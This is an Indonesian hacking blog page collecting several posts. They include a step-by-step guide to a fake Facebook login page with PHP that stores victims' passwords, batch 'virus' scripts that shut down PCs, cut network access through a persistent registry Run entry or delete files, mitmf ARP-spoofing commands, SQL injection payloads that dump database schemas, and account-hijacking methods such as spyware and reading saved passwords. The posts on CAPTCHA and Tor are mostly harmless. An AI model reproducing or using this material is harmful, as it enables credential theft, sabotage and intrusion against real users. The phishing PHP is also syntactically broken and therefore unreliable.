Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, June 16, 2019

Keren !! Inilah Cara Hack Akun Facebook Terbaru 2019

Pernah gak liat postingan Facebook teman, tapi postingannya aneh tidak seperti biasa? atau pas mau masuk akun facebook tiba-tiba tidak bisa, katanya password salah ? Besar kemungkinan akun tsbt sudah di hack oleh hacker.

foto hacking fb
Example



Sudah banyak kasusnya, dan di blog ini sudah sempat dibahas bagaimana cara mengembalikan akun facebook yang di hack secara detail. Walaupun begitu, tetap aja ada yang tidak berhasil dan terpaksa harus menghapus akun facebook yang di hack tsbt.

Itulah kenapa, mimin ingin membagi informasi tentang bagaimana cara hack facebook agar kamu bisa melindungi akun facebook kamu dari serangan hacker yang tidak bertanggung jawab. Jadi jangan salah paham dulu yak, (kaya kamu salah mengartikan perhatian dia ke kamu hehehe), karna disini mimin tidak berniat membantu kamu melakukan hack ke akun orang lain.

Disini mimin akan bagikan informasi ini karena ingin kamu belajar bagaimana membuat akun facebook kamu aman. Karena menjaga dan menghormati privacy orang itu sangat mimin junjung tinggi (cieeee elaaahhh  hehehhe)

Belum lagi undang-undang ITE. Hati-hati buat yang niat macam-macam bisa masuk penjara.

Cara nge-hack akun Facebook seseorang

Judul yang benar untuk artikel ini adalah “cara hack akun facebook“, bukan “cara hack facebook“.

Banyak dari kita yang tidak paham apa perbedaan hal ini.

Pertama, kalau kita ingin hack facebook, maka fokusnya adalah facebook, situs facebook itu sendiri, dan kita perlu pengetahuan hacking yang benar-benar tinggi untuk bisa menembus pertahanan situs facebook. Dan hal ini hampir ga mungkin dilakukan oleh orang biasa.

Sedangkan kalau kita bicara mengenai cara hack “akun” facebook, fokus kita ada di user, atau penggunanya. Fokus kita ada di orang yang di targetkan. Dan ini artinya, yang kita targetkan adalah perangkat dari orang tsbt, misalnya handphone, tablet, laptop, komputer, atau akun emailnya.

Jadi disini caranya pun bisa jadi lebih mudah, karena pertahanan laptop si target ga mungkin sama dengan server facebook yang dijaga ketat dengan system canggih dan engineer yang juga hebat.

Apalagi kalau target adalah teman yang laptop/hp nya bisa kamu pinjem sebentar2. Itu akan bikin pekerjaan hack-menghack ini jadi jauh lebih mudah.

Jadi disini fokus kita adalah ke pengguna. Dan berikut ini adalah beberapa cara yang untuk melakukan hack ke akun facebook seseorang..

Inilah Cara Hack Akun Facebook Terbaru 2019

Cara hack ini yang paling mudah, simple dan bahkan bisa dilakukan oleh pemula. Jadi cara ini juga yang paling ga terduga sih. Cara ini bisa jadi mudah karena kita bisa akses perangkat orang tsbt, mungkin pinjem beberapa menit cukup untuk hal ini.

A.1 Install aplikasi spyware
Spyware merupakan aplikasi kejahatan yang berfungsi untuk memata matai aktivitas komputer kita. Tentu saja aplikasi ini memata-matai aktivitas yang ada di komputer kita tanpa kita sadari layaknya mata-mata. Setelah merekam semua aktivitas di komputer kamu, Spyware akan mengirimkan pesan kepada pihak ketiga atau si pembuat spyware.

spyware nugaskuyy
Spyware


Banyak banget apllikasi spyware yang bisa digunakan untuk memata-matai kegiatan seseorang di perangkat mereka.

Aplikasi ini bisa dipakai bahkan untuk tahu apa aja yang mereka lakukan di perangkat tsbt tak terkecuali email dan password facebook kamu.

Untuk installnya gampang banget, tinggal pinjem ponselnya sebentar terus pasang aplikasi nya udah deh aplikasi spyware akan mengirimkan semua aktivitas di perangkat nya.

Makanya gaes jangan asal minjemin Ponsel atau perangkat kamu ke sembarang orang. Kita tidak tahu kan apa yang akan mereka lakukan pada perangkat kita. Tetap waspada dan hati hati ya !

A.2 Lihat password tersimpan
Pernah gak saat kita log in Facebook di browser ada pilihan untuk mensave password dan email kita? Biasanya kita tertarik untuk menyimpannya agar jika kita lupa password tidak harus memperbaiki akun dan ribet mengganti password akun facebook kita.

Pop up pada jendela browser akan menyimpan email dan password kita, oleh karena itu siapapun yang bisa akses perangkat kita, bisa mengakses data password facebook yang tersimpan tersebut.

Cara ini sama juga, asalkan ada alasan kita buat pinjem perangkat mereka sebentar, lalu cek password yang tersimpan, maka sudah pasti dapat itu data loginnya.

Nah … udah tahukan bahayanya, ayo jangan asal pinjemin ponsel atau laptop kamu ya gaes !

Kalau temen hack mungkin cuma iseng atau pengen jahilin kamu. Dan biasanya ga akan sampe merusak. Tapi ya, jaga-jaga wajib sih.
Sosial Media terbesar saat ini adalah Facebook. Bahkan sebuah riset mengatakan bahwa 1/4 penduduk bumi saat ini adalah pengguna Facebook.

Sayangnya, tidak semua orang punya pemahaman yang baik dalam proteksi dan keamanan akun mereka. Sehingga mereka bisa jadi target empuk.
Tingkat keamanan server Facebook memang sangat tinggi. Tapi penggunanya engga 😀

Berikut ini beberapa metode hacking yang bisa dipakai untuk hack akun pengguna dari jarak jauh tanpa pinjem-pinjeman hp.

TAHUKAH APA ITU MITM(Man In The Middle) ??

B.1 Phishing
Phising merupakan suatu metode hacking yang udah ada sejak jaman dahulu kala. Dan ga hanya dilakukan untuk hack akun facebook, tapi bisa untuk semua jenis akun. Entah itu akun sosmed, internet banking, akun email, dll.

phising nugaskuyy
Phising


Phising site dibuat sedemikian rupa, sehingga mirip sama tampilan website targetnya.

Dikasus kita sekarang ini misalnya, tampilan situs phising akan dibuat seperti tampilan login facebook. Yang berbeda hanya di url-nya saja.

Ketika kamu klik link ke situs tersebut, dan kamu tidak jeli, kamu pikir kamu sedang berada dilaman login facebook. Padaha bukan. Lalu kamu dengan bodo*nya memasukkan username dan password kamu dilaman tsbt.

Data login kamu tersebut akan otomatis disimpan dan dikirim ke si pembuat situs pishing tsbt.

Langkah antisipasinya adalah saat kamu dapat sms ataupun email yang berisi link dan mereka meminta kamu mengklik link tsbt, pastikan bahwa link tersebut beneran link yang menuju ke website resmi bukan website tiruan/abal-abal.

Inilah Cara Hack Akun Facebook Terbaru 2019

B.2. Keylogger
Nah… cara hack facebook yang biasa digunakan selanjutnya adalah menggunakan metode Keylogger.

keylogger nugaskuyy
Keylogger


Apa sih keylogger??? Keylogger merupakan Aplikasi yang dapat merekam semua aktivitas pengguna komputer.

Metode ini sangat mudah untuk digunakan. Hacker hanya perlu memasang aplikasi pada komputer korban kemudian apapun yang diketik oleh korban akan di save menjadi Log yang akan dikirimkan melalui Email atau alamat FTP.
Untuk penginstallan keylogger, ini biasanya dilakukan dengan cara mengirimkan email berisi link donwload aplikasi ini, atau lewat situs-situs download gratis yang bisa diam-diam menginstal aplikasi ini.

Aplikasi ini mirip seperti virus karena biasanya selalu tersembunyi dan berjalan di background tanpa kita ketahui.

B.3. Hijacking Session
Tahu gak gaes? menggunakan wifi disembarang tempat ternyata dapat digunakan peretas melalui cookie browser untuk mengautentikasi pengguna pada situs WEB untuk mengakses akun korban.

Metode ini sering digunakan para hacker untuk mengambil email dan password Facebook korban.

Masih mau cari wifi walaupun kamu jadi gak aman???  kalo mimin sih masih wkwkwkkw

B.4. Menggunakan Social Engineering
Social engginering adalah manipulasi psikologis yang dilakukan oleh seseorang dalam sebuah aksi untuk menguak informasi target target melalui korban atau pihak lain agar memperoleh informasi yang dimaksud.

Biasanya hacker akan memanfaatkan kata kunci sederhana seperti tanggal lahir korban untuk mencoba membuka akun facebook korban. Dengan metode ini hacker akan sangat mudah masuk ke akun facebook korban.

B.5. Memanfaatkan Kelalaian Target
Kamu suka lupa log out dari akun facebook kamu? hayooo siapa yang suka ceroboh disini? Perilaku yang lalai seperti lupa log-out akun facebook memang terlihat biasa aja, tapi kalau kejadiannya di komputer publik, ini bisa jadi masalah.

Hal ini bisa disalah gunakan untuk melakukan kejahatan oleh orang yang tidak bertanggung jawab. Mulai sekarang lebih berhati – hati lagi ya gaes.

Cara mengamankan akun Facebook dari hack
Nah… mimin akan share berapa hal yang harus kamu jaga untuk mengamankan akun facebok kamu dari serangan  para hacker.  berikut cara mengamankan akun facebook dari hack :

Pertama , Sembunyikan alamat emailmu dari profil facebook, selain untuk mengamankan dari serangan hacker menyembunykan email juga mencegah spaming dan phishing ke email kamu.

Inilah Cara Hack Akun Facebook Terbaru 2019

Kedua, Pastikan bahwa alamat email pemulihan dan nomor hp adalah milik kamu pribadi, bukan punya temen atau pacar atau tetangga. Karena nomor hp dan email bisa dipakai untuk mengambil akses ke akun facebook kamu.

Ketiga, tambahkan kontak terpercaya. Dan pastikan kontak terpercaya ini adalah akun keluarga dan orang-orang yang kamu 100% yakin dan kenal baik. Ini bisa jadi proteksi kalau akun kamu di hack bisa didapatkan kembali dengan menghubungi kontak terpercaya ini.

Keempat, Aktifkan fitur verifikasi dua langkah di facebook. Fitur verifikasi dua langkah ini berfungsi sebagai penghalang. Setiap kali kamu akan masuk ke facebook, facebook akan mengirimkan kode ke nomor hp kamu, sehingga ketika terjadi kelalaian, misalnya ada yang tau password kamu, mereka tetap tidak berhasil login, karena akan diminta kode 6 digit yang dikirimkan ke nomor hp kamu.

Kelima, aktifkan pemberitahuan login di perangkat asing. Untuk langkah keempat dan kelima bisa kamu baca disini bukugue.com/cara-melindungi-akun-facebook-dari-hacker/

Akhir Kata
Nah gaes begitulah beberapa metode cara Hack Facebook dan cara mengamankan akun facebook kamu dari serangan hacker.

Semoga informasi ini bisa kamu terima dan ditanggapi dengan bijak. Jangan sampai setelah kamu baca artikel ini malah berniat mencoba hal hal yang negative dengan menghack facebook orang lain.

Ohya, jika kamu punya metode hack facebook dengan cara yang lebih mudah dari cara diatas boleh ya di share dikolom komentar.


Sekian artikel kali ini. Selamat beraktivitas. Terimakasih

Sunday, November 25, 2018

Cara Mudah Membuat Web Phising Terbaru

Cara Mudah Membuat Web Phising Terbaru

Pada postingan kali ini saya akan membahas tentang cara membuat web phising. Walaupun banyak sekali orang sudah mengetahuinya, tetapi saya yakin masih belum banyak orang yang bisa melakukannya dan ingin tau cara membuat web phisinh seperti postingan kali ini. Sebelum kita belajar cara membuat web phising, tahukan kalian apa itu web phising ? sekali lagi tahukah kalian apa itu web phising. 
Web Phising adalah web yang palsu untuk menipu korban sehingga korban memasukkan user dan password pada biasanya. Lalu bagimana cara kita membuat web phising ini ? Berikut ini adalah cara mudah membuat web phising terbaru versi nugaskuyy.

Langkah-langkah membuat web phising :

  1. Cari dan buka alamat web yang mau kita jadikan web phising. Misalkan kita akan membuat web phising https://www.facebook.com
  2. Setelah halaman terbuka sepenuhnya, tekan tombol CTRL + U di keyboard secara bersamaan. Kemudian akan muncul source code nya.
  3. Copy semua Source Code nya, lalu tekan CTRL + A kemudian CTRL+C untuk mengcopy semua source codenya. 
  4. Buka notepad/wordpad.
  5. Pastekan semua source code nya CTRL+V yang sudah di copy tadi.
  6. Cari menggunakan CTRL+F, cari <form action="fb.com" method="post">
  7. Ganti fb.com dengan phising.php. 
  8. Ubah method "post" menjadi "get".
  9. Save file dengan nama index.html, file type "All File".
  10. Buka Notepad baru. Copy kan Code PHP ini ke notepad.
  11. <?php header ('Location: http://fb.com ');
    $handle = fopen(passwords.txt, a);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, =);
    fwrite($handle, $value);
    fwrite($handle, rn);
    }
    fwrite($handle, rn);
    fclose($handle);
    exit;
    ?>
     
  12. Ganti fb.com dengan facebook.com misal.
  13. Save dengan nama phising.php.
  14. Uplod ke hosting gratis.
  15. Setelah berhasil Upload jangan lupa setting permission/chmod di atur 777 untuk file password.txt, agar password yang diketikkan oleh korban dapat tersimpan.
  16. Selesai
Itulah tadi cara mudah membuat web phising terbaru. Gunakan web phising untuk memancing korban memasukkan password nya.

Tuesday, November 20, 2018

Cara Membuat Virus Sederhana Menggunakan NotePad


Cara Membuat Virus Sederhana Menggunakan NotePad

Pada postingan kali ini kita akan belajar membuat virus sederhana dengan menggunakan notepad. Sebelumnya kita akan mengenali virus ini terlebih dahulu sebelum kita akan membuat virus sederhananya di dalam notepad. Untuk itu kita perlu yang namanya sebuah pengertian dasar dari sebuah virus.

Pengertian Virus
Virus adalah sebuah software yang menggangu komputer, mulai dari process, hardware sampai perangkat lunak yang ada didalamnya sekalipun. Virus memilik banyak sekali nama , ada yang berbahaya namun juga ada yang tidak berbahaya. Virus yang berbahaya namanya malware. Malware ini sangat berbahaya sekali jika kita terkena. Dampaknya bisa berupa penyadapan, kehilangan kendali sistem, hingga hilangnya akses untuk membuaka folder di komputer. Berbahaya sekali bukan ? Oleh karena itu kita harus hati-hati dengan namaya virus. Jangan langsung download file dari internet tanpa dengan jelas siapa atau dari mana sumbernya, kemungkinan itu virus.

Namun, kali ini kita akan mencoba membuat virus sederhana yang dapat dilakukan oleh siapa saja. adal beberapa contoh virus yang bisa kita buat dengan notepad ini.

1. Virus Shutdown Komputer

@echo off msg * I don't like you shutdown -c "Error! Komputer kamu terpaksa harus Shutdown!" -s

Copy + Paste kan syntax diatas kedalam notepad, lalu save dengan extensi .bat dengan type file nya All files.

2. Mematikan Internet Secara Permanen


echo @echo off&gt;c:windowswimn32.bat echo break off&gt;&gt;c:windowswimn32.bat echo ipconfig/release_all&gt;&gt;c:windowswimn32.bat echo end&gt;&gt;c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

Copy + Paste kan syntaxnya diatas kedalam notepad, lalu save dengan ekstensi .bat dengan type file nya All files.

3. Virus Jahil

@echo off title Kuis hari ini! :menu cls echo Jika kamu kena virus apa yang kamu lakukan? pause echo pilih yang mana: echo 1. Matiin komputer echo 2. Format aja echo 3. Nangis echo 4. Beli komputer baru set input=nothing set /p input=Choice: if %input%==1 shutdown -s -t 30 if %input%==2 del c:xxx if %input%==3 @ECHO off msg * Muka lu jelek msg * Ngaca dulu gih! msg * Hayo lu, CPU lu gw acak-acak ya msg * Udah, install ulang aja msg * Mau kelar kan masalahnya? @ECHO off :top START %SystemRoot% system32notepad.exe GOTO top

Copy + Paste kan syntaxnya diatas kedalam notepad, lalu save dengan extensi .bat dengan type file nya All Files.

Itulah tadi cara mudah membuat virus sederhana dengan menggunakan notepad. Sebenarnya masih banyak namun 3 diatas adalah yang paling menarik menurut saya, so jangan lupa untuk dicobain dan jangan lupa untuk dibuka sendiri wkwk..


Wednesday, November 14, 2018

Apa itu Man in the middle (MITM) ? - Hacking Attack

Apa itu Man in the middle attack (MITM) ?

Pada postingan kali ini kita akan membahasa salah satu teknik hacking penyadapan yang dilakukan oleh hacker yaitu Man in the middle attack atau lebih dikenal dengan MITM. Sebelum kita membahas lebih dalam mengenai Man in the middle attack ini, kita akan mengetahui pengertian dari MITM itu sendiri terlebih dahulu.
Pengertian MITM

Man in The Middle Attack adalah salah satu teknik hacking dimana si hacker menempatkan dirinya berada pada lokasi di antara dua perangkat yang sedang terhubung. Dikarenakan hacker berada ditengah-tengah komunikasi maka dia dapat membaca, memodifikasi atau merusak integrity dari sebuah packet yang dikirim atau diterimadari kedua perangkat tersebut. Jika hacker berhasil menyadap korban hasil yang didapatkan bisa berupa apa saja yang korban lakukan. Bisa berupa password yang sangan privasi.

Cara Man in the Middle (MITM) bekerja

Cara kerja Man in the middle ini adalah kunci nya di ARP (Addresses resolution protocol). Mengapa ARP ? Karena ARP ini bertugas mengubah atau menerjemahkan alamat suatu IP address mejadi sebuah MAC Address. Pada windows kita dapat mengecek table ARp dengan mengetikkan perintah "arp-a" di command prompt (cmd). Kita akan melihat semua IP address yang terhubung dan MAC addressnya. 
Jika kita perhatikan rute normal ketika perangkat terhubung pada jaringan seperti ini.



Ini adalah gambaran ketika komunikasi antara client dan server secara normal. Namun jika si hacker mengambil jalah tengah antara mereka. Maka hacker dapat melancarkan akisinya. Seperti gambar dibawah ini




Hal ini dapat terjadi karena ARP memiliki kelemahan yaitu:
  1. Setiap ARP Request atau ARP respon selalu trusted/dipercaya.
  2. Klien dapat menerima sebuah respon walau mereka tidak request.
Ketika ada perangkat yang baru terhubung, maka akan mencari tau siapa routernya dengan mengirim ARP request tadi, sehingga hacker dapat menjawab request dari client sebagai router sedangkan ke router aslinya hacker mengaku sebagai client. Sehingga ketika client akan request sesuatu kepada router maka hacker dapat melihat paketnya. Wah..wah.. wahh.

Cara melakukan teknik MITM ( Man in the middle )

Untuk melakukan teknik MITM tidak menggunakan sembarangan perangkat. OS yang digunakan adalah Kali linux, atau bisa juga untuk pnegguna windows menjalankan kali linux pada virtual box.

Tool  yang digunakan untuk melakukan serangan ini adalah Framework MITM. Dalam melakukan serangan ini prinsip nya pertama adalah harus satu jaringan dengan korban. Kemudian untuk perintahnya ketikkan sebagai berikut. mitmf -arp -spoof -gateway[ip router] -targets [ip target].

Contoh : mitmf -arp -spoof -gateway 192.168.1.1 -targets 192.168.1.15

Kemudian aktifkan ip forward dengan cara mengedit file /proc/sys/net/ipv4/ip_forward yang awalnya 0 (tidak aktif) menjadi 1 (aktif)

Akibat dari serangan MITM
  1. Penyadapan
  2. Pencurian Cookie
  3. Menipu DNS
  4. Inject Java Script
Cara Menghindari Serangan MITM

Sebenarnya untuk serangan MITM ini susah sekali untuk di tebak karena yang namanya panyadapan kita tidak akan benar-benar tahu jika hacker telah serangannya. Kita hanya bisa menduga saja apabila ada hal-hal yang mencurigakan pada saat kita request kita bisa mengecek ARP table dengan perintah arp-a di command prompt. Pastikan tidak ada dua IP dengan sama network yang memiliki MAC address yang sama


Monday, November 12, 2018

Cara Menggunakan Captcha Pada Form Login


Cara Menggunakan Captcha Pada Form Login

CAPTCHA atau disebut cap-ch-uh yang merupakan singkatan dari Completely Automated Public Turing test to tell Computer and Humans Apart. Merupakan sejenis kaedah challenge-respon untuk memastikan bahwa respon yang dihasilkan hanya boleh dibuat oleh manusia dan bukannya komputer. Dengan kata lain, CAPTCHA adalah pengesahan kata ujian yang dimasukkan dari suatu bentuk sign up seperti sign ini akun gmail.

Fungsi CAPTCHA
  1. Mencegah commernt spam pada umumnya pemilik web/blog/lainnya. Tidak hanya ingin komen webnya terlihat bagus dalam penampilan, kuantitas tapi tentu kualitas, tapi tidak tau kalau adminnya sendiri yang spam.
  2. Mencegah spam bot. Karena Spam bot tidak bisa membaca CAPTCHA, karena string string pemogramannya sudah tetap. Tak mungkin captcha yang setiap saat berubah dapat dibaca oleh bot kecuali bot itu berasal dari engine bot itu sendiri.
  3. Mencegah flood. Flood bisa diartikan mengirimkan data secara berulang ulang.
Membuat Captcha

Langkah pertama yang perlu kita lakukan untuk menggunakan capthca nya pada form logn ialah kita siapkan terlebih dahulu web servernya. Pada kasus ini saya menggunakan Apache dan MySQl.



Selanjutnya kita akan menyiapkan Script yang akan kita gunakan untuk captcha nya pada web browser. Ketikkan script berikut dan letakkan dengan nama file homepage.hmtl


Jika scriptnya benar maka akan tampil seperti gambar dibawah ini






Setelah itu, agar lebih menarik bisa kita tambahkan css pada form nya agar menjadi rapi dan bagus. Disini kita akan menggunakan css langsung dari internet atau bisa didownload.


Selanjutnya kita akan membuat file captcha.php nya. Pada bagian ini merupakan bagian yang paling penting untuk di buat karena dari sini captcha akan beroperasi dan dicek untuk digunakan. Captcha akan mengecek apakah inputan yang dimasukkan user adalah benar dan sesuai.


Terakhir kita akan membuat file form.js sebagai notifikasi apabila terdapat kesalahan perintah dan succes ketika berhasil. Notofikasi isi sangat membantu kita dalam memberitahu user bahwa captcha yang dimasukkan salah atau tidak sesuai sehingga user dapat mencoba lagi memasukkan captcha yang tepat.

Lakukan pengujian dengan login pada form. Cek apakah berhasil menembus captcha nya atau tidak. Uji coba dengan email asli.


Friday, November 9, 2018

Apa itu Deep Web dan Cara Mengakses Dark Web

Apa itu Deep Web dan Cara Mengakses Deep Web


Pada postingan kali ini kita akan membahas apa itu Deep Web dan bagaimana cara mengakses deep web. Terlebih dahulu kita akan mengenal apa itu deep web sehingga kita tidak terjebak dalam sesuatu yang tidak kita ketahui. Taukah kalian ungkapan dunia maya ? Dunia maya bisa dikatakan sebagai permukaan dari deep web itu sendiri. Jika digambarkan pada sebuah lautan, maka tampak dunia maya seperti yang ada pada gambar sehingga semua orang bisa mengaksesnya.
Namun, kita akan membahas apa itu deep web ? Apa pengertian deep web dan bagaimana cara mengaksesnya. Supaya kita tidak salah mengartikan tentang deep web lagi, kita akan membahasnya.

Apa itu Deep Web ?

Deep Web adalah konten-konten yang tidak terindex pada mesin pencarian seperti google,bing dan yahoo. Deep web itu ibaratkan laut pada bagian dalam sedangkan mesin pencari seperti google, bing dan yahoo merupakan kapal pesiar yang hanya berlayar pada permukaan saja. Namun, deep web ini masih dapat ditelusuri dengan tool khusus namanya browser Tor.

Ibarat mesin pencari pada umumnya seperti google, bing dan yahoo yang menggunakan browser mozilla dan chrome untuk aksesnya. Browser tersebut bisa kita ibaratkan sebagai kapal pesiar yang hanya bisa berlayar dipermukaan laut saja. Untuk dapat masuk kedalam laut apa yang diperlukan ? Ya, sebuah kapal selam. Kapal selam ini kita ibaratkan adalah Tor. 

Menurut hasil riset jumlah konten situs yang digolongkan sebagai deep web sangatlah banyak. Hampir 96% dari keseluruhan internet. Artinya situs yang biasa kita akses seperti blogger, youtube, facebook dll hanya lah 4% saja.

Konten yang ada pada deep web adalah konten yang rahasia dan tidak boleh sembarang oleh bisa melihatnya maupun mengaksesnya. Misalkan konten yang ada di deep web adalah database dari hasil penelitian, berkas-berkas pemerintahan, sistem-sistem keamanan dan lainnya. Tentu hal ini tidak boleh diketahui oleh sembarang orang.
Namun, masih banyak orang awam yang tidak tau deep web dan menganggap deep web merupakan tempat yang tidak pantas atau mengerikan. Walaupun sebenarnya ada seperti itu, namun tidak semua deep web itu buruk. Kita harus bijak dalam memandang sesuatu, tidak boleh melihatnya hanya dari segi negatif nya saja. Didalam deep web memang ada beberapa situs pornografi, jual beli narkotika, situs kekerasan dan peretasan. Hampir semuanya dari situs deep web yang kita kenal berdomain dot onion.

Bagaimana Cara Mengakases Deep Web ?

Jaringan TOR ( The Onion Router ) atau bisa disebut jaringan bawang adalah server yang membuat pengguna menjadi anonim di internet. Tor bekerja dengan cara mengarahkan lalu lintas internet anda ke lebih 3 relay sebelum sampai ke tujuan.



Pemilik site berdomain onion pastilah orang orang yang identitasnya tidak ingin diketahui. Karena jika mereka mempublikasikan maka mereka akan mudah terdeteksi dan mudah untuk dilacak. Oleh karena itu lah mereka menggunakan domain onion agar tidak bisa dilacak dan terdeteksi.

Cara mengakses deep web (Dark Web) tersebut salah satunya adalah dengan menggunakan Tor browser yang bisa di download di TorProject.

Berikut ini Tips yang akan membuat kita aman ketia memasuki dark web:
  1. Jangan mendaftarkan email. username dan password anda jika informasi tersbut sama dengna yang anda gunakan pada akun akun berharga kita. Jika memang diperlukan buat email khusus.
  2. Jangan mengaktifkan atau mendownload plugin pada tor browser. Alasannya adalah agar browser tidak terekploitasi program jahat seperti BeEF (Browser anda akan dikuasai jika suatu situs menjalankan BeEfing.
  3. Jangan mendownload pada tor browser, karena besar kemungkinan terdapat virus berbahaya atau semacamnya
  4. Jangan download melaui torrent di deep web.
  5. Jika diatas sudah di lakukan, tidak perlu menutup kamera laptop anda secara berlebihan karena setidaknya hacker memerlukan IP address kita untuk dapat mengakses sedangkan Ip kita sudah di protect oleh Tor Browser.
Ketika memasuki darkwen anda mungkin akan merasa tersesat karena tidak memiliki acuan. Ada Hiden Wiki kok. Silahkan menggunakan pencarian di hidden wiki pada tor browser.

Saturday, October 27, 2018

Apa itu SQL Injection dan Cara Melakukannya

Apa itu SQL Injection dan Cara Melakukannya


Pada postingan kali ini saya akan membahas mengenai SQL injection. Saya baru pertama kali tau dan belajar apa itu SQL injection dan melakukannya. Kemarin saya baru saja melakukan simulasi SQL injection pada sebuah database yang telah disiapkan. Dengan settingan security yang low melakukan SQL injection menjadi sangat mudah. Sebelum membahas bagaimana cara melakukan SQL injection, kita akan mengenal terlbih dahulu apa itu SQL Injection.
SQL Injection adalah sebuah teknik yang melakukan serangan pada database melalui celah kemanan database tersebut. Pengertian diatas dapat kita uraikan bahwa teknik ini merupakan serangan yang menargetkan pada database. Dengan melakukan serangan terhadap database target, semua informasi menjadi terlihat sehingga hacker dapat mengambil alih sebuah sistem. Dengan begitu, sistem yang akan diambil alih oleh hacker dapat dengan mudah di salah gunakan oleh hacker.

Ada beberapa alasan kenapa SQL Injection ini bisa terjadi, yaitu :
  1. Karakter-karakter pelolos yang tidak disaring dengan benar, bisa kita bilang sebuah validasi masukkan. Jika sebuah sistem tidak memiliki validasi inputan yang benar, maka hacker dapat melakukan query injection pada masukkan sehingga diproses ke dalam database. Pernyataan tersebut dapat diproses pada aplikasi pengguna atau pengguna akhir, sehingga menyebabkan kesalah keluaran yang ditampilkan. Keluaran yang akan ditampilkan bukan yang harusnya dikeluarkan, seperti contoh password.
  2. Penanganan tipe yang tidak benar, dapat menyebabkan injeksi terjadi. Pada sebuah masukkan harusanya diberi batasan-batasan tyope masukkan yang akan diproses. Hal ini bertujuan untuk memberikan keamanan pada masukkan agar tidak terjadi adanya masukkan yang tidak dikenali type datanya.
  3. Celah keamanan dalam server basis data,  menjadi faktor utama SQL injection terjadi. Celah pada server dapat dengan mudah ditembus oleh hacker dengan injection. Ini merupakan hal yang harus kita perhatikan untuk kemanan pada sebuah server. Semakin tinggi tingkat keamanan server, semakin kecil kemungkin Injection dilakukan.
Adapun cara untuk melakukan SQL Injection adalah sebagai berikut:

%' or '0'='0 ==> Perintah ini adalah untuk menampilakan semua data yang da pada database.
%' or 0=0 union select null,version()# ==> Perintah ini untuk mengetahui Versi database dari target.
%' or 0=0 union select null, user()# ==> Perintah ini adalah untuk meampilkan database user.
%' or 0=0 union select null, database()# ==> Perintah diatas untuk mengetahui nama database.
%' and 1=0 union select null, table_name from information_schema.tables# ==> Menampilkan semua informasi Nama table.
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# ==> Menampilkan semua tables user schema.
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users'# ==> Menampilkan Field Content


Itulah tadi menegani SQL Injection dan cara melakukannya, intinya untuk menghindari dari serangan injection, kita harus memperketat keamanan database. Banyak cara yang dapat kita lakukan untuk mengamankan databse kita, hal ini untuk menjaga kerahasiaan data yang tersimpan di database. Hal-hal yang kurang berkenan dalam teknik hacking ini dapat kita atasi jika kta tau penyebab-penyebab nya dan prose terjadinya.

#SalamHacking

Monday, October 22, 2018

Cara Terbaru Hack Akun Instagram Orang Lain 2018



Cara Terbaru Hack Akun Instagram Orang Lain

Pada postingan kali ini saya akan membahas tentang hack akun instagram orang lain. Dari judulnya saja kita bisa melihat bahwa kalian yang berada pada artikel ini sedang ingin melakukan hacking terhadap akun instagram milik orang lain. Pernah kah kalian berfikir jika saja yang menjadi korban itu adalah diri kalian sendiri atau akun kalian sendiri. Langkah apa saja yang akan kalian lakukan untuk mengatasi hack akun instagram ini ?
Pada pembahasan kali ini, saya akan bercerita tentang pengalaman saya meng hack akun instagram orang lain. Akun instagram orang ini merupakan akun teman saya sendiri tetapi dia sering login-login menggunakan hape saya. Namanya sebut saja "Korban", dia ini awalnya mempunyai sebuah akun baru untuk sebuah instagram baru yaitu sebuah grup. Saya ingatkan terlebih dahulu, hacking merupakan tindak kejahatan jika kita tidak menempatkan pada posisi yang salah. Ada pasal yang menegaskan bahwa tindakan semacam ini akan dikenakan sanksi berat jika pelaku memberikan dapak negatif untuk si korban. Namun, kadang korban tidak sigap dalam menggapi masalah hacking ini, terutama pada hack akun instagram.

Cara terbaru untuk hack akun instagram orang lain sebenarnya sangatlah mudah, hanya saja kita terkadang salah menggunakan teknik ini yang nantinya dapat berdampak buruk pada si korban maupun anda sendiri. Jika kalian tetap ingin nekat meng hack akun instagram orang lain, saya akan lanjutkan cerita saya diatas.

Awalnya dia sudah membuat akun instagramnya tersebut melalui handphone nya sendiri, entah kenapa dia suatu hari ingin pinjam handphone saya untuk membuka instagram. Saya tanya ke dia kenapa dia tidak pakai hp nya ternyata dia sedang tidak ada kuota. Kasihan mendengar alasanya tersebut hati nurani saya berkata untuk meminjamkan nya sebentar. Setelah tidak lama kemudian, sekitar 15 menit atau 10 dia kembalikan handphone saya. Malam hari, adalah waktu saya untuk social messagging. Biasanya saya buka instgaram untuk melihat-lihat info terkini dunia maya. Namun, dihari tersebut saya merasakan keanehan pada instagram saya. Timeline saya adalah foto-foto orang yang tidak saya kenal, dan banyak sekali endorse-endorse yang menurut saya itu adalah spam. Kecurigaan saya menjadi-jadi hingga akhir nya saya cek profil untuk instagram saya. Ternyata aku instagram yang masih saya buka adalah milik teman saya tadi

KOK BISA ??

Awalnya saya heran dan bertanya-tanya, mana mungkin dia lupa untuk keluar dari akun instagramnya. kemudian saya tanya dan ternyata dia memang sudah mengeluarkannya, artinya dia tidak lupa. Rasa penasaran saya menjadi tinggi hingga akhirnya saya cek menu pengaturan dan ternyata yang menjadi penyebabnya adalah info login nya dalam posisi ON




Hacking dengan niat yang jahat tidak akan menimbulkan manfaat bagi anda, melainkan berdampak buruk bagi si korban. Jika kalian setelah melihat artikel ini masih mencari artikel lain untuk melanjutkan niat anda, maka ada yang salah dengan hati anda. Jadikan sebagai pelajaran dari apa yang kalian baca diatas, bahwa untuk mengambil hak orang lain itu merupakan suatu perbuatan yang tercela.

"Luruskan Niat. Tebarkan Manfaat"

#SalamHacking


Friday, October 19, 2018

Cara Mudah Hack Wifi Password di Kali Linux

Cara Mudah Hack Wifi Password di Kali Linux


